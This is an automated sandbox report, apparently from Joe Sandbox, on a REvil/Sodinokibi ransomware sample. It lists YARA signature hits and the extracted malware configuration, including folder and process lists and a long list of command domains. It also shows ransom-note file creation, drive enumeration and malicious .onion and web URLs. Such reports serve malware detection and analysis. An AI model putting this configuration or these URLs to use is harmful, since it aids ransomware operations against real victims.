            • 0x497c:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF
            • 0x5b27:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55
            • 0x8e8c:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F
            • 0x948e:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89
            • 0xa526:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
            0.0.RQzHm5vLxs.exe.d90000.0.unpackREvilREvil PayloadR3MRUM
            • 0x17340:$RE1: expand 32-byte kexpand 16-byte k
            • 0xba30:$RE2: sysshadow
            • 0x105f8:$RE2: sysshadow
            • 0x14270:$RE2: sysshadow
            • 0xba50:$RE3: SCROLLBAR
            • 0x10610:$RE3: SCROLLBAR
            • 0x14288:$RE3: SCROLLBAR
            • 0xba40:$RE4: msctfime ui
            • 0x10604:$RE4: msctfime ui
            • 0x1427c:$RE4: msctfime ui
            • 0xba60:$RE5: \BaseNamedObjects\%S
            • 0x1061c:$RE5: \BaseNamedObjects\%S
            • 0x14294:$RE5: \BaseNamedObjects\%S
            • 0x4d34:$decode: 33 D2 8A 9C 3D FC FE FF FF 8B C7 0F B6 CB F7 75 0C 8B 45 08 0F B6 04 02 03 C6 03 C8 0F B6 F1 8A 84 35 FC FE FF FF 88 84 3D FC FE FF FF 47 88 9C 35 FC FE FF FF 81 FF 00 01 00 00 72 C3
            0.2.RQzHm5vLxs.exe.d90000.0.unpackJoeSecurity_RevilYara detected RevilJoe Security
              Click to see the 3 entries

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: Registry Key setAuthor: Joe Security: Data: Details: .985drm9, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RQzHm5vLxs.exe, ProcessId: 6232, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\recfg\rnd_ext
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000000.00000003.1921990735.0000000002509000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: REvil {"pk": "N9tiPqA45L8cXACRHlBdJFayV8M5MEF4JjppDRO+oHU=", "pid": "30", "sub": "113", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["perflogs", "$windows.~ws", "system volume information", "google", "programdata", "appdata", "windows.old", "windows", "intel", "program files", "application data", "msocache", "mozilla", "$windows.~bt", "boot", "$recycle.bin", "tor browser", "program files (x86)"], "fls": ["ntuser.ini", "thumbs.db", "ntuser.dat", "autorun.inf", "ntldr", "ntuser.dat.log", "bootsect.bak", "boot.ini", "iconcache.db", "bootfont.bin", "desktop.ini"], "ext": ["cpl", "cmd", "diagpkg", "adv", "mod", "ico", "deskthemepack", "msi", "ani", "cab", "theme", "scr", "hlp", "com", "prf", "msp", "exe", "mpa", "diagcab", "key", "386", "hta", "ps1", "nls", "drv", "cur", "dll", "diagcfg", "icl", "bin", "spl", "msc", "lnk", "rom", "bat", "lock", "themepack", "ldf", "nomedia", "msstyles", "rtp", "sys", "msu", "icns", "shs", "ocx", "idx", "wpx", "ics"]}, "wfld": ["backup"], "prc": ["thebat64.exe", "dbsnmp.exe", "mydesktopqos.exe", "wordpad.exe", "sqlwriter.exe", "agntsvc.exe", "winword.exe", "mysqld.exe", "excel.exe", "mysqld_nt.exe", "msaccess.exe", "sqlbrowser.exe", "isqlplussvc.exe", "encsvc.exe", "steam.exe", "infopath.exe", "sqlservr.exe", "oracle.exe", "sqbcoreservice.exe", "thebat.exe", "firefoxconfig.exe", "ocomm.exe", "mydesktopservice.exe", "tbirdconfig.exe", "msftesql.exe", "thunderbird.exe", "onenote.exe", "mspub.exe", "xfssvccon.exe", "dbeng50.exe", "ocautoupds.exe", "visio.exe", "sqlagent.exe", "powerpnt.exe", "synctime.exe", "ocssd.exe", "mysqld_opt.exe", "outlook.exe"], "dmn": "p-ride.live;avtoboss163.ru:443;rarefoods.ro;brownswoodblog.com;patriotcleaning.net;so-sage.fr;katherinealy.com;innovationgames-brabant.nl;eshop.design;drvoip.com;liepertgrafikweb.at;rino-gmbh.com;monstarrsoccer.com;thenalpa.com;thiagoperez.com;fskhjalmar.se;eafx.pro;oncarrot.com;axisoflove.org:443;aquacheck.co.za;bajova.sk;innovationgames-brabant.nl;charlottelhanna.com;ilovefullcircle.com;dnqa.co.uk;catalyseurdetransformation.com;imajyuku-sozoku.com;kelsigordon.com;handyman-silkeborg.dk;pxsrl.it;poems-for-the-soul.ch;jimprattmediations.com;gaearoyals.com;advance-refle.com;pixelhealth.net;electricianul.com;unexplored.gr;look.academy;endlessrealms.net;bonitabeachassociation.com;pro-gamer.pl;donau-guides.eu;9nar.com;hartofurniture.com;silverbird.dk;smartercashsystem.com;pedmanson.com;publicompserver.de;georgemuncey.com;delegationhub.com;kenmccallum.com;rentingwell.com;animation-pro.co.uk;diakonie-weitramsdorf-sesslach.de;hiddensee-buhne11.de;expohomes.com;laylavalentine.com;quitescorting.com;pisofare.co;babysitting-hk.helpergo.co;johnsonweekly.com;jglconsultancy.com;barbaramcfadyenjewelry.com;alnectus.com;matthieupetel.fr;sber-biznes.com;supercarhire.co.uk;sunsolutions.es;the-cupboard.co.uk;computer-place.de;jobstomoveamerica.org;testitjavertailut.net;go.labibini.ch;funworx.de;chatterchatterchatter.com;lsngroupe.com;iexpert99.com;espaciopolitica.com;skink
              Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpackMalware Configuration Extractor: Sodinokibi {"pk": "N9tiPqA45L8cXACRHlBdJFayV8M5MEF4JjppDRO+oHU=", "pid": "30", "sub": "113", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["perflogs", "$windows.~ws", "system volume information", "google", "programdata", "appdata", "windows.old", "windows", "intel", "program files", "application data", "msocache", "mozilla", "$windows.~bt", "boot", "$recycle.bin", "tor browser", "program files (x86)"], "fls": ["ntuser.ini", "thumbs.db", "ntuser.dat", "autorun.inf", "ntldr", "ntuser.dat.log", "bootsect.bak", "boot.ini", "iconcache.db", "bootfont.bin", "desktop.ini"], "ext": ["cpl", "cmd", "diagpkg", "adv", "mod", "ico", "deskthemepack", "msi", "ani", "cab", "theme", "scr", "hlp", "com", "prf", "msp", "exe", "mpa", "diagcab", "key", "386", "hta", "ps1", "nls", "drv", "cur", "dll", "diagcfg", "icl", "bin", "spl", "msc", "lnk", "rom", "bat", "lock", "themepack", "ldf", "nomedia", "msstyles", "rtp", "sys", "msu", "icns", "shs", "ocx", "idx", "wpx", "ics"]}, "wfld": ["backup"], "prc": ["thebat64.exe", "dbsnmp.exe", "mydesktopqos.exe", "wordpad.exe", "sqlwriter.exe", "agntsvc.exe", "winword.exe", "mysqld.exe", "excel.exe", "mysqld_nt.exe", "msaccess.exe", "sqlbrowser.exe", "isqlplussvc.exe", "encsvc.exe", "steam.exe", "infopath.exe", "sqlservr.exe", "oracle.exe", "sqbcoreservice.exe", "thebat.exe", "firefoxconfig.exe", "ocomm.exe", "mydesktopservice.exe", "tbirdconfig.exe", "msftesql.exe", "thunderbird.exe", "onenote.exe", "mspub.exe", "xfssvccon.exe", "dbeng50.exe", "ocautoupds.exe", "visio.exe", "sqlagent.exe", "powerpnt.exe", "synctime.exe", "ocssd.exe", "mysqld_opt.exe", "outlook.exe"], "dmn": "p-ride.live;avtoboss163.ru:443;rarefoods.ro;brownswoodblog.com;patriotcleaning.net;so-sage.fr;katherinealy.com;innovationgames-brabant.nl;eshop.design;drvoip.com;liepertgrafikweb.at;rino-gmbh.com;monstarrsoccer.com;thenalpa.com;thiagoperez.com;fskhjalmar.se;eafx.pro;oncarrot.com;axisoflove.org:443;aquacheck.co.za;bajova.sk;innovationgames-brabant.nl;charlottelhanna.com;ilovefullcircle.com;dnqa.co.uk;catalyseurdetransformation.com;imajyuku-sozoku.com;kelsigordon.com;handyman-silkeborg.dk;pxsrl.it;poems-for-the-soul.ch;jimprattmediations.com;gaearoyals.com;advance-refle.com;pixelhealth.net;electricianul.com;unexplored.gr;look.academy;endlessrealms.net;bonitabeachassociation.com;pro-gamer.pl;donau-guides.eu;9nar.com;hartofurniture.com;silverbird.dk;smartercashsystem.com;pedmanson.com;publicompserver.de;georgemuncey.com;delegationhub.com;kenmccallum.com;rentingwell.com;animation-pro.co.uk;diakonie-weitramsdorf-sesslach.de;hiddensee-buhne11.de;expohomes.com;laylavalentine.com;quitescorting.com;pisofare.co;babysitting-hk.helpergo.co;johnsonweekly.com;jglconsultancy.com;barbaramcfadyenjewelry.com;alnectus.com;matthieupetel.fr;sber-biznes.com;supercarhire.co.uk;sunsolutions.es;the-cupboard.co.uk;computer-place.de;jobstomoveamerica.org;testitjavertailut.net;go.labibini.ch;funworx.de;chatterchatterchatter.com;lsngroupe.com;iexpert99.com;espaciopolitica.com;
              Source: RQzHm5vLxs.exeReversingLabs: Detection: 92%
              Source: RQzHm5vLxs.exeAvira: detected
              Source: https://patriotcleaning.net:443/admin/graphic/ervzot.jpgsAvira URL Cloud: Label: malware
              Source: http://decryptor.top/45C1E9BA4D645606Avira URL Cloud: Label: malware
              Source: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606Avira URL Cloud: Label: malware
              Source: https://patriotcleaning.net/admin/graphic/ervzot.jpgAvira URL Cloud: Label: malware
              Source: https://patriotcleaning.net/Avira URL Cloud: Label: malware
              Source: https://patriotcleaning.net/WAvira URL Cloud: Label: malware
              Source: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/Avira URL Cloud: Label: malware
              Source: http://decryptor.top/Avira URL Cloud: Label: malware
              Source: RQzHm5vLxs.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D945F6 CryptAcquireContextW,CryptGenRandom,0_2_00D945F6
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D94C77 CryptBinaryToStringW,CryptBinaryToStringW,0_2_00D94C77
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D94C16 CryptStringToBinaryW,CryptStringToBinaryW,0_2_00D94C16
              Source: RQzHm5vLxs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: C:\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\$winreagent\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\program files\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\program files (x86)\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\recovery\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\$winreagent\scratch\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\desktop\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\documents\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\downloads\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\favorites\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\links\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\music\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\onedrive\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\pictures\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\saved games\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\videos\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\.ms-ad\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\3d objects\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\contacts\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\downloads\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\favorites\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\links\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\music\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\onedrive\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\pictures\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\recent\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\saved games\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\searches\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\videos\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\accountpictures\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\desktop\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\documents\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\downloads\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\libraries\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\music\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\pictures\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\videos\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\bpmlnobvsb\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\dvwhkmnfnn\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\ltkmybseyz\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\nebfqqywps\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\onbqclyspu\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\qncycdfijj\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\ummbdneqbn\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\uoojjozirh\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\vlzdgukutz\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\xzxhavgrag\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\zbedcjpbey\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\ztgjilhxqb\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\bpmlnobvsb\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\dvwhkmnfnn\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\ltkmybseyz\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\nebfqqywps\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\onbqclyspu\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\qncycdfijj\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\ummbdneqbn\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\uoojjozirh\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\vlzdgukutz\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\xzxhavgrag\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\zbedcjpbey\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\ztgjilhxqb\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\favorites\links\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\pictures\camera roll\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\pictures\saved pictures\985drm9-readme.txtJump to behavior
              Source: unknownHTTPS traffic detected: 172.67.132.175:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.32.57.142:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.219.93:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 138.197.111.104:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 137.74.231.3:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeDirectory created: c:\program files\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeDirectory created: c:\program files\37db623e.lockJump to behavior
              Source: Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: RQzHm5vLxs.exe, 00000000.00000003.2211440830.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153961554.0000000003B73000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: RQzHm5vLxs.exe, 00000000.00000003.2216942802.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2211386957.0000000003BE9000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2344505998.0000000003BEA000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215318961.0000000003BE3000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928315056.0000000003BEA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\T source: RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153761267.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2216977253.0000000002589000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158945262.0000000002583000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2344713671.0000000002589000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\g5 source: RQzHm5vLxs.exe, 00000000.00000003.2162546986.0000000003B89000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: z:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: x:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: v:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: t:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: r:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: p:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: n:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: l:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: j:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: h:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: f:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: b:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: y:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: w:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: u:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: s:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: q:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: o:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: m:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: k:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: i:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: g:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: e:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: c:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: a:Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D961AD FindFirstFileW,FindNextFileW,FindClose,0_2_00D961AD
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: C:\Windows\WinSxS\Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..m-service.resources_31bf3856ad364e35_10.0.19041.1865_en-us_b6d4cf229ed6dfa6.manifestJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3_hidserv.dll.mui_561adfc8Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: C:\Windows\WinSxS\Backup\Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..keyhelper.resources_31bf3856ad364e35_10.0.19041.1_en-us_a9723a608a71b1eb.manifestJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3.manifestJump to behavior

              Networking

              barindex
              Source: RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
              Source: RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
              Source: 985drm9-readme.txt17.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt13.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
